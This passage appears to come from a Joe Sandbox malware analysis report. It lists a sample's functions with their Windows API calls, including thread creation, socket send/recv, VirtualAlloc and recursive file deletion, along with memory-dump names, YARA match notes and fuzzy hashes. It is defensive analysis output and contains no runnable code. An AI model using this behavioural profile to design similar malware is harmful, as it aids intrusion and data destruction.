                                                                                                                                                                • Instruction ID: d333d6c4ad3f85cc38a285b68f6202d91673c9221154f4c61c0439e671ddfdfe
                                                                                                                                                                • Opcode Fuzzy Hash: 6a880788fccffb7a6852245d2a4ab63d2dabddf777da5d8c624b978478869ea5
                                                                                                                                                                • Instruction Fuzzy Hash: 35F0E933A08714ABD710E675C942BCBB7ECBF04354F1005A9D99DD3142E766E704DBA1
                                                                                                                                                                Function 000A15B8 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00000001,00000004,?,000A161B,00000001,00000000,?,000AAA99,00000001,00000004,00000000,00000001,?,?,000A0938), ref: 000A15EA
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                • Opcode ID: 2c42abdd51519a159d0419ddf3c92282655855e4f16efef280cacd90e6989226
                                                                                                                                                                • Instruction ID: 2c1e3d41dc0c865cc052b425e949689a144e00a143debfe51a0b65bb8c9d47e4
                                                                                                                                                                • Opcode Fuzzy Hash: 2c42abdd51519a159d0419ddf3c92282655855e4f16efef280cacd90e6989226
                                                                                                                                                                • Instruction Fuzzy Hash: DDE06531E00A22DAEA712AF69C00BEB76889F837A0F154120AD06D61D1DF64CD0285E6
                                                                                                                                                                Function 6FE7C150 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • RtlAllocateHeap.NTDLL(007B0000,?,?,?,6FE7A0EC), ref: 6FE7C165
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                • Opcode ID: 15dc846c36ebc9c0ce37a4b9654632d06cb3db7373f8159deadff038a23b74ff
                                                                                                                                                                • Instruction ID: 80bc8165f0e57a9160a646999def507a2488367e2ddf88c4dce48704c6b60856
                                                                                                                                                                • Opcode Fuzzy Hash: 15dc846c36ebc9c0ce37a4b9654632d06cb3db7373f8159deadff038a23b74ff
                                                                                                                                                                • Instruction Fuzzy Hash: 4FD0C974200309AF9E149F69E845D7B3BADBB8AA64710851AF82C97741EF31F8208961
                                                                                                                                                                Function 0006DB3C Relevance: 1.5, APIs: 1, Instructions: 16threadCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,0006DB60,?,00000000,00000000), ref: 0006DB53
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateThread
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2422867632-0
                                                                                                                                                                • Opcode ID: 59c8be7bfed44f1587fea76122684b7fff751c5b6797f48bc8ccdb004f5f8bdf
                                                                                                                                                                • Instruction ID: 0aba1a236ba22eeb846644f0e260a1d916452c8df6ee608049292362f2901389
                                                                                                                                                                • Opcode Fuzzy Hash: 59c8be7bfed44f1587fea76122684b7fff751c5b6797f48bc8ccdb004f5f8bdf
                                                                                                                                                                • Instruction Fuzzy Hash: 6BD012B6B50248BEBB005BB2AC08DBB779EDB24210B01C422BD08CA000D63AE8208A64
                                                                                                                                                                Function 000649E0 Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • WSAStartup.WS2_32(00000202,00000000), ref: 000649F5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Startup
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 724789610-0
                                                                                                                                                                • Opcode ID: a58bb98ee19ded148a4ec3c37e206011e9988389ae737f8392be25494607f29f
                                                                                                                                                                • Instruction ID: f9cdb5e634ce0572dcb601ea0da60a39ee3bc822bdfc970e40b44b66d97d4c0d
                                                                                                                                                                • Opcode Fuzzy Hash: a58bb98ee19ded148a4ec3c37e206011e9988389ae737f8392be25494607f29f
                                                                                                                                                                • Instruction Fuzzy Hash: C8D0C9725586084EF611AAB4AC0BCB4B76C8312615F0003AA68A5835D2E649161882A7
                                                                                                                                                                Function 0006280A Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • std::_Deallocate.LIBCONCRT ref: 00062ECB
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Deallocatestd::_
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1323251999-0
                                                                                                                                                                • Opcode ID: 96dd3169ced21f31ec5b18273d46f1e500e6461f832ab0249736071218e75d5f
                                                                                                                                                                • Instruction ID: da25d01981296eb2d94dcd124fe1c8d54705f1a5d273a3aa68ce671bf1263eda
                                                                                                                                                                • Opcode Fuzzy Hash: 96dd3169ced21f31ec5b18273d46f1e500e6461f832ab0249736071218e75d5f
                                                                                                                                                                • Instruction Fuzzy Hash: 74C08C3264420C73CA0039C2EC02EBA7B8F9B10760F048021FA0808162E5A3A570A6E5
                                                                                                                                                                Function 00084BB3 Relevance: 1.5, APIs: 1, Instructions: 10networkCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: recv
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1507349165-0
                                                                                                                                                                • Opcode ID: ba6927ad14d34a558c084fe5c41046b697c060644f4361a00436da719c9e3f22
                                                                                                                                                                • Instruction ID: 247e7ae1d2e5694ca2299255979632c89ee2ff35bee29f7cc8774be7295d66c6
                                                                                                                                                                • Opcode Fuzzy Hash: ba6927ad14d34a558c084fe5c41046b697c060644f4361a00436da719c9e3f22
                                                                                                                                                                • Instruction Fuzzy Hash: D6C04C75108608BF9F151B91DC04CBD3B6AD7456607008154B90545110D637955096A0
                                                                                                                                                                Function 00084BCC Relevance: 1.5, APIs: 1, Instructions: 10networkCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: send
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2809346765-0
                                                                                                                                                                • Opcode ID: c2d90cb18fc864b5b3e71a7c7a53bba2861f42d1184215ebcdf3e2828ce3def7
                                                                                                                                                                • Instruction ID: b01c11f10dfbd984752056a1d10a1a2b8845bc04bcfc012080b3231e7afe7e23
                                                                                                                                                                • Opcode Fuzzy Hash: c2d90cb18fc864b5b3e71a7c7a53bba2861f42d1184215ebcdf3e2828ce3def7
                                                                                                                                                                • Instruction Fuzzy Hash: F9C09B7610850CFF9F151FA1DC04CBD3FBED744760B008614F90545111D737D9109790
                                                                                                                                                                Function 6FE67810 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,6FE66A1E), ref: 6FE67826
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InfoNativeSystem
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1721193555-0
                                                                                                                                                                • Opcode ID: 0087b3f8a92e87a5ac3989b1041aa6761189982caad8e9442f4dac9e37003157
                                                                                                                                                                • Instruction ID: 1461dc88228c1fc2e3c7166e799889e71676ccde0b17d07de96b85b175bd1170
                                                                                                                                                                • Opcode Fuzzy Hash: 0087b3f8a92e87a5ac3989b1041aa6761189982caad8e9442f4dac9e37003157
                                                                                                                                                                • Instruction Fuzzy Hash: 9BC0027C805A048FCB00AF24E59A4497FE5BB47215F80452AD9D9C2640E6349978CA92
                                                                                                                                                                Function 6FE74C10 Relevance: 1.4, APIs: 1, Instructions: 172COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                • Opcode ID: e0f249b2bd79e6dc4f6b8d523ac5ada3fca64fe8493ba016cfd398eed68ea2a6
                                                                                                                                                                • Instruction ID: dbd3a458d2ffe3b4f4ddfa71bf71f457958e8a906b071e4e9b2f6abb57b4cdbf
                                                                                                                                                                • Opcode Fuzzy Hash: e0f249b2bd79e6dc4f6b8d523ac5ada3fca64fe8493ba016cfd398eed68ea2a6
                                                                                                                                                                • Instruction Fuzzy Hash: A17102B4500B448BD731CF29C980B52BBF1BF49718F608A1EE9DA8BA81DB75F449CB51
                                                                                                                                                                Function 025505A7 Relevance: 1.3, APIs: 1, Instructions: 80memoryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,02550019), ref: 0255060B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                • Opcode ID: ccad463976669a87284a6a7cb1acfa588aa77062a64908f32cc2ab2616e0bbe0
                                                                                                                                                                • Instruction ID: 02be0d55dc928478e22f00cdcb0b33d94ab0ada3ada8f63c7b899557bf30d9fc
                                                                                                                                                                • Opcode Fuzzy Hash: ccad463976669a87284a6a7cb1acfa588aa77062a64908f32cc2ab2616e0bbe0
                                                                                                                                                                • Instruction Fuzzy Hash: A721A772B012195BD720DA98EC51BAAF7A8FF84319F1001ABED08D7680E771DA0087D5
                                                                                                                                                                Function 000707C0 Relevance: 1.3, APIs: 1, Instructions: 9memoryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • VirtualAlloc.KERNEL32(00000040,00003000,00000000,?,?,00070905,?,00000000,00003000,00000040,00000000), ref: 000707CF
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                • Opcode ID: 2321c008f527cb475724456987eda5d0457197cb018a47d29ab32e21b7d90b02
                                                                                                                                                                • Instruction ID: ae6c69c6e58859300755748b6e0e6a58660beffbce03d109fc75d2e80c6ae623
                                                                                                                                                                • Opcode Fuzzy Hash: 2321c008f527cb475724456987eda5d0457197cb018a47d29ab32e21b7d90b02
                                                                                                                                                                • Instruction Fuzzy Hash: 6EC0483200020DFBCF026FC2ED048DA3F2AFB08260B008120FE1804030C7379930AB91
                                                                                                                                                                Function 6FE47530 Relevance: 1.3, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • CloseHandle.KERNEL32(?,6FE4699D,?,6FE4689D,?,6FE468AD,?,6FE468F8), ref: 6FE4753A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                • Opcode ID: 3a0acb58a0610b2d7af8f40851ab87a8da570cd2a6c10afd256ede40861ba8b7
                                                                                                                                                                • Instruction ID: fe39f3f0646aa75b21246635089f09caa0c5cd066dbd403a66f031f6778cbecb
                                                                                                                                                                • Opcode Fuzzy Hash: 3a0acb58a0610b2d7af8f40851ab87a8da570cd2a6c10afd256ede40861ba8b7
                                                                                                                                                                • Instruction Fuzzy Hash: AAB00274504B01DFCF50DF68C58891A7FE5AB4B351B014858E589C7320D6349494DB15

                                                                                                                                                                Non-executed Functions

                                                                                                                                                                Function 6FE7FB30 Relevance: 17.9, APIs: 5, Strings: 5, Instructions: 386libraryloaderCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetCurrentProcess.KERNEL32(6FEA6AC4,?,?,?,?,6FEA6AC4,6FEADDE0), ref: 6FE7FB47
                                                                                                                                                                • GetProcAddress.KERNEL32(SymAddrIncludeInlineTrace), ref: 6FE7FB83
                                                                                                                                                                • GetProcAddress.KERNEL32(SymQueryInlineTrace), ref: 6FE7FBCB
                                                                                                                                                                • GetProcAddress.KERNEL32(SymFromInlineContextW), ref: 6FE7FCC2
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$CurrentProcess
                                                                                                                                                                • String ID: SymAddrIncludeInlineTrace$SymFromInlineContextW$SymGetLineFromInlineContextW$SymQueryInlineTrace$X
                                                                                                                                                                • API String ID: 2190909847-1953985048
                                                                                                                                                                • Opcode ID: 49a83f6375b091df901c0fdb3912d364dd0d748aec6a0108853291ccf87d5316
                                                                                                                                                                • Instruction ID: 7cbf2a69444ac0a9cad67591ba4ad4a3958fdd639813994704909b7b5c3d58a2
                                                                                                                                                                • Opcode Fuzzy Hash: 49a83f6375b091df901c0fdb3912d364dd0d748aec6a0108853291ccf87d5316
                                                                                                                                                                • Instruction Fuzzy Hash: E4F1CE3150C7819FD725CF28C88179ABBE5FF85324F204A2EF99497290DB79E945CB82
                                                                                                                                                                Function 0007A467 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 147fileCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?,000D22A0,000D22B8,pth_unenc), ref: 0007A4FE
                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0007A535
                                                                                                                                                                • RemoveDirectoryW.KERNEL32(?), ref: 0007A5AF
                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0007A5DD
                                                                                                                                                                • RemoveDirectoryW.KERNEL32(?), ref: 0007A5E6
                                                                                                                                                                • SetFileAttributesW.KERNEL32(?,00000080), ref: 0007A603
                                                                                                                                                                • DeleteFileW.KERNEL32(?), ref: 0007A610
                                                                                                                                                                • GetLastError.KERNEL32 ref: 0007A638
                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0007A64B
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                                                                                • String ID: pth_unenc
                                                                                                                                                                • API String ID: 2341273852-4028850238
                                                                                                                                                                • Opcode ID: a71c6cc58a5aaa5bf63ad61c07b8a8af102c14f050ede7aba3595b8210853875
                                                                                                                                                                • Instruction ID: 7deaeddae327f9f2f58feb5b8d77e826fd34c9810250421004f195919833eea6
                                                                                                                                                                • Opcode Fuzzy Hash: a71c6cc58a5aaa5bf63ad61c07b8a8af102c14f050ede7aba3595b8210853875
                                                                                                                                                                • Instruction Fuzzy Hash: 80510B35A001198ADF24DF78C8486FEB3B4FF95304F4482A9E80D93150EB7E9E86CB95
                                                                                                                                                                Function 6FE7E970 Relevance: 16.2, APIs: 5, Strings: 4, Instructions: 475COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 6FE7EADF
                                                                                                                                                                • GetFullPathNameW.KERNEL32(?,00000200,CAFFFB54,00000000), ref: 6FE7EAEC
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6FE7EAFD
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6FE7EB16
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast$FullNamePath
                                                                                                                                                                • String ID: ()/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\core\src\io\borrowed_buf.rs$\\?\\\?\UNC\$uo&$uo&
                                                                                                                                                                • API String ID: 2482867836-1997178444
                                                                                                                                                                • Opcode ID: b47e15c0da29c481528c059cbe11fdc8360691b6803731dcdfd7ee128a5a7fa4
                                                                                                                                                                • Instruction ID: 8cbc4a354a23ddba7e92673c8bed59d4abff40ba9333f9a69c972486230a3a6a
                                                                                                                                                                • Opcode Fuzzy Hash: b47e15c0da29c481528c059cbe11fdc8360691b6803731dcdfd7ee128a5a7fa4
                                                                                                                                                                • Instruction Fuzzy Hash: A3028175E006148BDB24CF98D8847EDBFB1FF49318F24856AE815AB390EB71AC45CB91
